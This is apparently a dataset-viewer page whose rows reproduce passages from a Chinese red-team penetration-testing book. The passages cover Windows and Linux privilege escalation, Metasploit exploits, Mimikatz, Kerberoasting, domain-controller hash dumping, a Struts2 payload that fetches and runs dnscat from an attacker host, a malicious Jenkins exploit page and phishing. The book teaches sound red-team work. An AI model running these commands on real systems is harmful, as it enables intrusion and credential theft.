text
stringlengths 64
2.99M
|
---|
假设我们有一个配置为执行C:\Program Files (x86)\Cyber Kittens\Cyber Kittens.exe的服务。 如果具有Cyber Kittens 文件夹写权限,那么我们可以将恶意软件放到目录 C:\Program Files (x86)\Cyber Kittens\Cyber.exe(注意,缺少 Kittens.exe)。 |
wmic service get name,displayname,pathname,startmode |findstr/i "Auto" |findstr/i/v "C:\Windows\" |findstr/i/v """ 查找BINARY_PATH_NAME 查找不安全的服务注册表权限。 |
检查AlwaysInstallElevated注册表项是否启用。 检查AlwaysInstallElevated注册表项,该注册表项标识是否使用提升的权限安装.MSI文件(NT AUTHORITY \ SYSTEM)。 |
ServiceName : WavesSysSvc Path : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe ModifiableFile : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...} ModifiableFileIdentityReference : Everyone StartName : LocalSystem 对于WavesSysSyc服务,似乎每个用户都具有写权限,这意味着可以用恶意二进制文件替换WaveSysSvc64.exe文件。 |
upload ./shell.exe C:\users\test\shell.exe shell copy C:\users\test\Desktop\shell.exe "C:\ProgramFiles\Waves\MaxxAudio\ WavesSysSvc64.exe" 重新启动服务或等待系统重新启动。 |
将windows.txt复制到Kali系统的/opt/Windows-Exploit-Suggester目录。 python ./windows-exploit-suggester.py -i ./windows.txt -d 2018-03-21-mssb.xls。 |
msfconsole search manageengine use exploit/windows/http/manageengine_connectionid_write set SSL True set RPORT 8383 set RHOST <Your IP> exploit getsystem 您会发现无法访问系统,因为受到攻击的服务不是特权进程。 |
shell cd \ && dir/s tomcat-users.xml type "C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf\tomcat-users.xml" 现在使用获取的密码攻击Tomcat。 |
search tomcat use exploit/multi/http/tomcat_mgr_upload show options set HTTPusername sploit set HTTPpassword sploit set RPORT 8282 set RHOST <Metasploitable3_IP> set Payload java/shell_reverse_tcp set LHOST <Your IP> exploit whoami 您现在具有系统权限。 |
4.7.2 从内存中提取明文文本凭证 Mimikatz 工具已经存在了一段时间,在获取明文密码方面改变了游戏规则。 在Windows 10之前,在主机上以管理员身份运行Mimikatz工具,攻击者可以从LSASS(本地安全子系统)中提取明文密码。 |
shell reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\ WDigest/v UseLogonCredential/t REG_DWORD/d 1/f 这样设置的问题是我们需要用户重新登录系统。 |
图4.15 4.7.3 从Windows凭证存储中心和浏览器中获取密码 Windows凭证存储中心是Windows的默认功能,它为系统、网站和服务器保存用户名、密码和证书。 |
一旦进入Mac主机环境,许多攻击就与Windows的情况类似了(举个例子,扫描默认口令、Jenkin/应用程序攻击、嗅探网络以及通过SSH或VNC横向移动)。 |
在macOS中创建恶意的Excel文件,我们打开新的Excel工作表,转到工具,查看宏,在此工作簿中创建宏,当Microsoft Visual Basic打开时,删除所有当前代码并将其替换为所有新的宏代码。 |
既然您已经突破了被攻击者的主机,从他们的工作站获取了所有秘密,掌握了被攻击者浏览的一些网站,并执行了一些netstat风格的侦查……下一步要做什么呢? |
Kerberos身份鉴权使用SPN功能,将服务实例与服务登录账户相关联。 举个例子,一个SPN对应一个服务账户,此服务账户运行MS SQL服务器、HTTP服务器和打印服务器等的SPN。 |
-T:查询指定域 -F:查询活动目录林,而不是域 -Q:在目标域或者目标林执行 */*:所有内容 我们可以从Setspn查询中获得什么类型的信息? |
我们可以在打印机、共享信息工作站、带有服务密码的平面文件文本、配置文件、iPad、Web应用程序页面源中包含密码的地方,找到这种类型的域账户。 |
PowerView使用PowerShell脚本,可在Windows域上获得网络态势感知信息。 它包含一组纯PowerShell脚本,可以替换各种Windows“net *”命令,它使用PowerShell AD挂钩和底层Win32 API函数,实现各种有用的Windows域功能。 |
作为攻击者,我们可以利用PowerView和PowerShell查询活动目录,活动目录中最低权限的用户——“域用户”即可完成任务,根本不需要本地管理员权限。 |
Sharphound是原始Bloodhound Ingester的C#版本,它更快、更稳定,可以用作独立二进制文件或作为PowerShell脚本导入。 Sharphound PowerShell脚本使用reflection和assembly.load,将已编译的BloodHound C#ingestor加载到内存。 |
Connect to bolt://localhost:7687 Username: neo4j Password: neo4j Change Password Password: New Password (4)在终端运行Bloodhound。 bloodhound Database URL: bolt://127.0.0.1:7687 Username: neo4j Password: New Password (5)加载数据。 |
MATCH (n) WHERE n.name="NEIL.PAWSTRONG@CYBERSPACEKITTENS. LOCAL"SET n.owned="phish", n.wave=1 运行查询,显示所有已被网络钓鱼的系统。 |
到目前为止,在没有扫描的情况下,我们已经能够获得有关该组织的大量信息,这都是本地活动目录用户(域用户)的权限,并且在大多数情况下,网络流量看起来很正常。 |
Bloodhound识别ACE中可能存在弱点的区域,包括谁能够更改/重置密码、向组添加成员、为其他用户更新脚本路径、更新对象或在对象上写入新ACE等。 |
图4.31 Empire中的psinject具备的功能描述如下:“能够使用ReflectivePick将代理注入另一个进程,将.NET公共语言运行库加载到进程中,执行特定的PowerShell命令,所有这些都无须启动新的powershell.exe进程! |
例如,一个经理具有访问其下属计算机的全部权限,在一个会议室/实验室的计算机上有多个用户具有管理员权限,内部系统配置错误,或者有人手动将用户添加到计算机本地管理员组,那么用户可以远程访问网络上其他工作站。 |
为了仔细检查我们是否具有访问权限,我通常会执行非交互式远程命令,如dir \[remote system]\C$,并且查看对C驱动器是否具有读/写权限,如图4.33所示。 |
jenkins_script_console:将Empire代理部署到Windows Jenkins服务器中没有身份鉴权的脚本控制台。 我们知道,Jenkins服务器通常没有启用鉴权,这意味着可以通过脚本实现远程代码执行。 |
powershell $([activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","buzz.cyberspacekittens.local"))).Navigate ("c:\windows\system32\calc.exe") 这将在系统中执行本地可执行文件,并且不能在可执行文件中包含任何命令行参数(因此cmd/k样式的攻击不能执行)。 |
$([activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455- 00A0C91F3880","buzz.cyberspacekittens.local"))).Navigate("\\neil.cyberspacekittens.local\Public\ adobeupdate.exe") 图4.36 如图4.37所示,buzz的机器上会弹出一个窗口,提示运行adobeupdate.exe文件。 |
4.8.7 传递散列 本地管理员账户散列传递(PTH),虽然这种老的攻击方式在大部分场景中已经不起作用了,但是这种攻击方式并未彻底绝迹,我们快速回顾一下。 |
因为,散列可以使用Mimikatz这样的工具轻松恢复,可以从本地账户提取(但需要本地管理员访问权限),可以通过转储域控制器恢复(不是明文密码)以及其他方式。 |
散列传递攻击基本的用途是攻击本地管理员,但目前很难再发挥作用,因为默认情况下,本地管理员账户已被禁用,并且新的安全功能已开始应用,例如本地管理员密码解决方案(LAPS),它为每个工作站创建随机密码。 |
当然,散列传递攻击发挥作用要求您必须是系统的本地管理员,即本地管理员账户“管理员”已启用,并且它是RID 500账户(这意味着必须是原始管理员账户,而不是新创建的本地管理员账户)。 |
Command: shell net user administrator User name Administrator Full Name Comment Built-in account for administering the computer/domain User's comment Country/region code 000 (System Default) Account active Yes Account expires Never 如果我们看到该账户处于活动状态,那么可以尝试从本地计算机中提取所有散列值。 |
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3710b46790763e07 ab0d2b6cfc4470c1::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59 d7e0c089c0::: 我们可以使用Empire(credentials/mimikatz/pth)工具,或者启动可信工具PsExec,提交我们的散列值,然后执行我们的自定义静荷,如图4.38所示。 |
如果您仍然可以看到使用本地管理员账户的情况,但环境中启用了 LAPS(本地管理员密码解决方案)方案,那么您可以使用几种不同的工具从活动目录中提取散列值。 |
4.8.8 从服务账户获取凭证 如果您发现获取的用户账户受限,无法从内存中获取密码,并且恰好没有在主机系统上获取密码,那么该怎么办? |
该漏洞的存在有以下原因:当从域控制器请求服务票证时,该票证使用关联的服务用户的NTLM散列进行加密。 由于任何用户都可以请求票证,因此这意味着如果可以猜中关联服务用户的NTLM散列(加密票证)的密码,那么我们就可以获得实际服务账户的密码。 |
powershell Add-Type -AssemblyName System.IdentityModel; New-Object System. IdentityModel.Tokens.KerberosRequestorSecurityToken- ArgumentList "HTTP/ CSK-GITHUB.cyberspacekittens.local" 提取所有的用户票证到内存中。 powershell Add-Type -AssemblyName System.IdentityModel; IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/nidem/kerberoast/ master/GetUserSPNs.ps1") | ForEach-Object {try{New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken-ArgumentList $_.ServicePrincipalName}catch{}} 当然,您也可以使用PowerSploit实现上述功能,如图4.39所示。 |
powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString ('http://bit. ly/2qx4kuH'); Invoke-Mimikatz -Command '"""kerberos::list/export"""' 图4.40 在我们导出票证后,票证驻留在被攻击者的机器上。 |
比较简单的破解账户的方法是使用名为tgsrepcrack的工具(JTR和Hashcat也支持破解Kerberoast,我们将很快讨论这个问题)。 使用Kerberoast破解票证。 |
cd /opt/kerberoast python tgsrepcrack.py [password wordlist] [kirbi tickets - *.kirbi] 如图4.41所示,服务账户csk-github的密码是“P @ ssw0rd! |
图4.42 4.9 转储域控制器散列 一旦我们获得域管理员的访问权限,从域控制器获取所有散列的旧方法就是,在域控制器上运行命令,使用Shadow Volume或Raw复制方法,获得Ntds.dit文件。 回顾Shadow Volume复制方法 由于我们可以访问文件系统,并且可以在域控制器上运行命令,因此作为攻击者,我们可以获取存储在Ntds.dit文件中的所有域散列值。 |
C:\vssadmin create shadow/for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUM BER] \windows\ntds\ntds.dit copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUM BER] \windows\system32\config\SYSTEM copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUM BER] \windows\system32\config\SAM reg SAVE HKLM\SYSTEM c:\SYS vssadmin delete shadows/for= [/oldest |/all |/shadow=] 1.NinjaCopy NinjaCopy(http://bit.ly/2HpvKwj)是另一个获取散列值的工具,运行在域控制器,可以用来获取Ntds.dit文件。 |
Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\ temp\ ntds.dit" 2.DCSync 到目前为止,我们已经回顾了两个从域控制器获取散列值的旧方法,这两个方法的前提条件是您可以在域控制器上运行系统命令,并且通常在该机器上存储文件,下面我们将尝试新的方法。 |
通常仅限于域管理员、组织管理员、域控制器组以及具有将Replicating Changes设置为Allow(例如Replicating Changes All/Replicating Directory Changes)权限的用户,DCSync方法将允许您的用户执行此攻击。 |
Lsadump::dcsync/domain:[YOUR DOMAIN] /user:[Account_to_Pull_Hashes] 更棒的是,PowerShell Empire集成了DCSync工具,因此使用更加方便。 Empire代码:powershell/credentials/mimikatz/dcsync_hashdump。 |
图4.43 4.10 在虚拟专用服务器上基于远程桌面进行横向迁移 在当今世界,计算机上运行着各种下一代杀毒软件,在计算机之间使用 WMI/PowerShell Remoting/PsExec 横向迁移并不总是最佳选择。 |
我们还将在攻击主机上配置本地端口,在本例中为3389(RDP),实现该端口的任何流量转发到虚拟专用服务器。 当该端口的流量转发到虚拟专用服务器时,该流量发送到虚拟专用服务器上本地的端口3389。 最后,我们需要设置一个端口,监听虚拟专用服务器3389端口,并使用Meterpreter的端口转发功能,将流量路由到被攻击者的主机。 |
(2)攻击者主机使用SSH工具,设置本地端口转发(在本地侦听端口3389),将所有流量发送到虚拟专用服务器的本地3389端口。 ssh -i key.pem ubuntu @ [VPS IP] -L 127.0.0.1:3389:127.0.0.1:3389 (3)在Meterpreter会话中,监听虚拟专用服务器的3389端口,转发流量从突破的主机横向迁移到下一个突破的主机。 |
portfwd add -l 3389 -p 3389 -r [Victim via RDP IP Address] (4)在攻击者主机上,打开微软的远程桌面客户端,将连接地址设置为localhost,即127.0.0.1并输入被攻击者的凭证,实现RDP连接,如图4.45所示。 |
在许多情况下,一旦存在本地文件包含(LFI)或远程执行代码(RCE)漏洞,我们就可以尝试提升权限,读取/etc/shadow文件(密码破解),或者采用类似Mimikatz的攻击。 |
ssh -D 127.0.0.1:8888 -p 22 <user>@<Target_IP> 单个端口的基本端口转移。 ssh <user>@<Target_IP> -L 127.0.0.1:55555:<Target_to_Pivot_to>:80 基于SSH的虚拟专用网络。 |
在进行任何类型的权限提升漏洞挖掘之前,首先了解Linux主机和系统的所有信息,包括用户、服务、定时任务、软件版本、弱凭证、错误配置的文件权限,甚至是Docker信息。 |
非特权本地用户利用这个漏洞,获取对其他只读内存映射的写访问权,从而实现了权限提升。 简而言之,此漏洞允许攻击者通过内核漏洞,从非特权用户提升到root用户。 |
sudo cp /Library/Preferences/VMware\Fusion/vmnet8/dhcpd.conf/Library/ Preferences/ VMware\Fusion/vmnet8/dhcpd.conf.bakup 编辑dhcpd.conf文件,使用172.16.250.x而不是192.168.x.x.网络。 sudo vi /Library/Preferences/VMware\Fusion/vmnet8/dhcpd.conf 编辑nat.conf,使用正确的网关。 sudo vi /Library/Preferences/VMware \ Fusion/vmnet8/nat.conf # NAT gateway address ip= 172.16.250.2 netmask= 255.255.255.0 重启服务。 sudo/Applications/VMware\Fusion.app/Contents/Library/services/services.sh --stop sudo/Applications/VMware\Fusion.app/Contents/Library/services/services.sh --start 现在,您以NAT模式启动THP Kali虚拟机,获得172.16.250.0/24范围内的动态IP地址。 |
msfconsole 搜索struts2,加载struts2漏洞工具。 search struts2 use exploit/multi/http/struts2_content_type_ognl 配置struts2 漏洞,获取dnscat静荷并在被攻击者服务器上执行。 |
set RHOST 172.16.250.10 set RPORT 80 set TARGETURI struts2-showcase/showcase.action set PAYLOAD cmd/unix/generic set CMD wget http://<your_ip>/dnscat -O /tmp/dnscat && chmod +x /tmp/dnscat && /tmp/dnscat --dns server=attacker.com,port=53 --secret=<Your Secret Key> run 图4.51 静荷执行后,在Metasploit中您将无法获得任何类型的确认,因为使用了dnscat静荷。 |
与您的第一个静荷交互 window -i 1 复制Shell进程 shell 使用键盘按键返回主菜单 Ctrl+ Z 与新Shell进行交互 window -i 2 输入Shell命令 ls 图4.52 您已经突破了OpenCMS/Apache Struts服务器! |
cd /tmp wget http://bit.ly/2vdh2Ub -O dirtycow-mem.c gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread ./dirtycow-mem 尝试DirtyCOW漏洞工具,在内核恐慌时,允许重启。 |
echo 0 >/proc/sys/vm/dirty_writeback_centisecs echo 1 >/proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops&& echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn whoami。 |
cat ~/.bash_history head ~/.ssh/id_rsa ssh -i ~/.ssh/id_rsa root@172.16.250.30 图4.55 您花了一些时间在第二个设备上,并尝试了解它的用途。 |
window -i 1 listen 127.0.0.1:8080 172.16.250.30:8080 在您的THP Kali虚拟机上,通过浏览器和端口转发协议(使用DNS协议,速度非常慢)。 |
http://127.0.0.1:8080/jenkins 图4.56 在Jenkins应用程序的凭证管理器内部,我们将看到db_backup用户密码已经存储,但是无法访问,如图 4.57 所示。 |
Ctrl + Z window -i 2 转到Jenkins的主目录,获取3个文件:credentials.xml、master.key和hudson.util.Secret。 cd /home/Jenkins 我们尝试下载这3个文件,或者采用base64编码从当前Shell复制。 |
base64 credentials.xml base64 secrets/hudson.util.Secret base64 secrets/master.key 可以将base64输出复制到Kali虚拟机中,解码它们,恢复db_backup用户的密码。 cd /opt/jenkins-decrypt echo "<base64 hudson.util.Secret>" | base64 --decode >hudson.util.Secret echo "<base64 master.key >" | base64 --decode > master.key echo "<base64 credentials.xml >" | base64 --decode >credentials.xml 破解密码,如图4.58所示。 python3 ./decrypt.py master.key hudson.util.Secret credentials.xml 图4.58 我们成功破解了db_backup用户的密码“)uDvra {4UL ^; r?* h”。 |
listen 127.0.0.1:2222 172.16.250.50:22 一旦使用db_backup账户进入数据库服务器(172.16.250.50),我们就会注意到此账户是超级管理员之一,并且可以利用sudo su命令进入root。 |
未知 第5章 助攻——社会工程学 5.1 开展社会工程(SE)行动 作为红队,我们喜欢采用社会工程(SE)攻击方式,不仅仅是因为通常对技术要求较低,更因为能够以非常低的成本成功实施高价值的行动。 |
本书第2版有一个例子,如果攻击mail.cyberspacekittens.com网址,那么我们就会购买网址mailcyberspacekittens.com,并设置一个虚假的Outlook页面来捕获凭证。 当被攻击者访问假网站并输入密码时,我们搜集这些数据,并将其重定向到公司的有效电子邮件服务器(mail.cyberspacekittens.com)。 |
将配置文件修改为以下内容 gedit /etc/setoolkit/set.config APACHE_SERVER= ON APACHE_DIRECTORY= / var / www / html HARVESTER_LOG= / var / www / html 启动社会工程工具包(SET)。 |
我的意思是他们可能使用双因子认证,用于网站的身份验证,但对于API、旧胖客户端或所有应用程序端点,可能不需要双因子认证。 我们已经看到许多应用程序在公共端点上需要双因子认证,但在应用程序的其他部分不使用双因子认证,缺乏安全保护。 |
使用LuckyStrike,我们可以在工作表中使用静荷创建Excel文档,甚至可以在Excel文档中存储完整的可执行文件(EXE),EXE文件可以使用ReflectivePE在内存中运行。 |
DDE协议定义消息的格式和规则。 DDE协议在共享数据的应用程序之间发送消息,并使用共享内存交换应用程序之间的数据。 应用程序可以使用DDE协议进行一次性数据传输和持续的数据传输。 |
DDEAUTO c:\windows\system32\cmd.exe "/k powershell.exe [empire payload here]" Empire有一个stager,它将自动创建Word文件和关联的PowerShell脚本,如图5.9所示。 |
第一个工具EmbededInHTML首先获取文件(任何类型的文件),加密文件,并将其作为资源嵌入HTML文件中,以及自动下载程序(用于响应用户单击嵌入资源),然后,当用户浏览HTML文件时,嵌入式文件即时解密,保存在临时文件夹中,接着将文件呈现给用户,就像从远程站点下载一样,这具体取决于用户的浏览器和显示的文件类型,该文件可以由浏览器自动打开,如图5.10所示。 |
例如,如果您一直在执行网络评估,就会知道,如果遇到无须身份验证的Jenkins应用程序(开发人员大量使用它进行持续集成),这几乎意味着完全突破。 |
首先,一个组织的被攻击者,访问公共网站(攻击者控制)或存储XSS静荷的页面。 被攻击者访问公共网站,攻击者将在其浏览器上执行JavaScript,运行恶意静荷。 |
现在,攻击者可以使用定制的Jenkins攻击程序,通过默认端口8080扫描网络范围内的每个IP地址(代码只扫描本地“/24”子网,但在真实的行动中,扫描范围要大得多)。 |
当找到存在漏洞的Jenkins服务器时,首先运行一个Groovy脚本静荷,从互联网上获取加密的二进制文件,将其解密到C:\Users\Public\RT.exe目录中,执行Meterpreter二进制文件(RT.exe)。 |
下载Jenkins War文件。 http://nurrors.jenkims.io/war-stable/1.651.2/ 启动Jenkins。 java -jar jenkins.war 浏览Jenkins。 http://<Jenkins_IP>:8080/ 测试Groovy脚本控制台。 http://<Jenkins_IP>:8080/script 在THP Kali 虚拟机上对Jenkins实施漏洞攻击,如图5.13所示。 图5.13 下载THP Jenkins漏洞利用工具(http://bit.ly/2IUG8cs)。 |
cd/opt/generateJenkinsExploit python3 ./generateJenkinsExploit.py -e badware.exe 创建名为badware.html的恶意JavaScript页面。 python3./generateJenkinsExploit.py -p http://<attacker_IP>/badware.exe.encrypted> badware.html 将加密的二进制和恶意JavaScript页面都移动到Web目录。 mv badware.html/var/www/html/ mv badware.exe.encrypted/var/www/html/ 现在,在完全不同的系统中,使用Chrome或Firefox访问攻击者网页http://<attacker_IP>/ badware.html,如图5.14所示。 |
只需访问该恶意页面,被攻击者的浏览器就会加载Groovy静荷,使用JavaScript和POST请求,通过端口8080,对被攻击者的内部“/24”网络地址进行扫描攻击。 |
5.4 结论 由于人存在恐惧、紧迫轻易和信任的弱点,因此,通过这些弱点我们可以创建一些攻击行动,这些行动在系统突破方面具有很高的成功率。 |
在本书第2版中,我们介绍了如何复制ProxCard II卡,因为它们没有任何保护,可以轻松复制,并且经常是分批大量购买,导致可以轻松暴力破解ID。 |
虽然它有很多其他功能,如autossh、DNS欺骗、Meterpreter、Ptunnel、script2email、urlsnarf和Responder等,但是红队使用它的主要用途是访问网络。 |
例如: wget http://swupdate.openvpn.org/as/openvpn-as-2.1.12-Ubuntu16.amd_64.deb 安装OpenVPN AS。 dpkg -i openvpn-as-2.1.12-Ubuntu16.amd_64.deb 删除当前配置文件,开始配置OpenVPN。 /usr/local/openvpn_as/bin/ovpn-init 在设置过程中: 确保设置ADMIN UI为所有接口 通过内部数据库,设置使用本地身份验证为YES 更新OpenVPN密码。 |
图6.4 确保在User Pemissions(用户权限)中配置/启用以下选项 所有服务器端私有子网 所有其他VPN客户端 (6)下载OpenVPN配置文件,然后连接到下载配置文件。 |
返回OpenVPN AS并编辑用户lanturtle参数 User Permissions→lanturtle→show 编辑VPN Gateway为“Yes”,添加内部地址范围(10.100.100.0/24) 保存并更新 以SSH方式登录到LAN Turtle上,使用命令reboot重新启动。 |
作为红队,Rubber Ducky是一个很好的工具,因为它可以用于社会工程攻击实践,加速PowerShell命令的传递,可以突破没有键盘但有USB接口的自助服务终端系统。 |
apt-get update apt-get upgrade export GIT_SSL_NO_VERIFY=1 git clone https://github.com/lgandx/Responder.git/tools/responder git clone https://github.com/CoreSecurity/impacket.git/tools/impacket cd /tools/impacket && python ./setup.py install apt-get -y install dsniff 在Kali机器的另一个终端中,安装所需的所有模块。 |
git clone https://github.com/hak5/bashbunny-payloads.git/opt/bashbunny-payloads 您可以选择任何类型的静荷,但在示例中,我们将设置Bash Bunny两个静荷:BunnyTap和QuickCreds。 cp -R/opt/bashbunny-payloads/payloads/library/credentials/BunnyTap/*/media/ root/BashBunny/payloads/switch1/ cp -R/opt/bashbunny-payloads/payloads/library/credentials/QuickCreds/*/media/ root/ BashBunny/payloads/switch2/ 注意,在每个Switch1和Switch2文件夹中都有一个名为payload.txt的文件。 |
这两种方法都很好用,我喜欢使用的版本是Wifite2版本,它是基于Alfa AWUS036NHA无线网卡完全重写的。 Wifite2界面简单易用,支持多种攻击,比Aircrack支持类型还多,并且可以轻松破解捕获的散列值,如图6.12所示。 图6.12 在设备方面,除Alfas两个设备外,使用WiFi Pineapple Nanos网卡可以很方便地实现更隐蔽的WiFi攻击。 |
如果您需要启动假的HostAP、通过另一个天线路由流量、搭建伪造页面、捕获身份验证信息、执行中间人攻击、运行Responder以及其他攻击,Nano是一个完成以上操作的轻量级硬件工具,如图6.13所示。 |
未知 第7章 四分卫突破——规避杀毒软件检测 7.1 为红队行动编写代码 能够成功地将红队和渗透测试人员区分的一个特征是能否适应和了解不同的安全防护机制。 |
在命令提示符中,导航到“C:\Program Files(x86)\Microsoft Visual Studio\2017\Community\VC\Auxiliary\Build”,需要注意此路径可能会有所不同,具体取决于您的Visual Studio版本。 |
SetWindowsHookEx的函数原型如下所示。 HHOOK WINAPI SetWindowsHookEx( _In_ int idHook, _In_ HOOKPROC lpfn, _In_ HINSTANCE hMod, _In_ DWORD dwThreadId ); SetWindowsHookEx函数采用整数表示钩子ID、指向函数的指针、句柄模块和线程ID,前两个值很重要。 |
MSDN声明:“此钩子在安装它的线程的上下文中调用。 通过向安装了钩子的线程发送消息来进行调用。 因此,安装钩子的线程必须有一个消息循环。 |
ToAscii输入参数vkCode、一个ScanCode、一个指向键盘状态数组指针、指向接收字母缓冲区的指针,以及uFlags的整数值。 vkCode和ScanCode来自键结构,键盘状态是先前声明的字节数组,用于保存输出的缓冲区,uFlags参数设置为0。 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.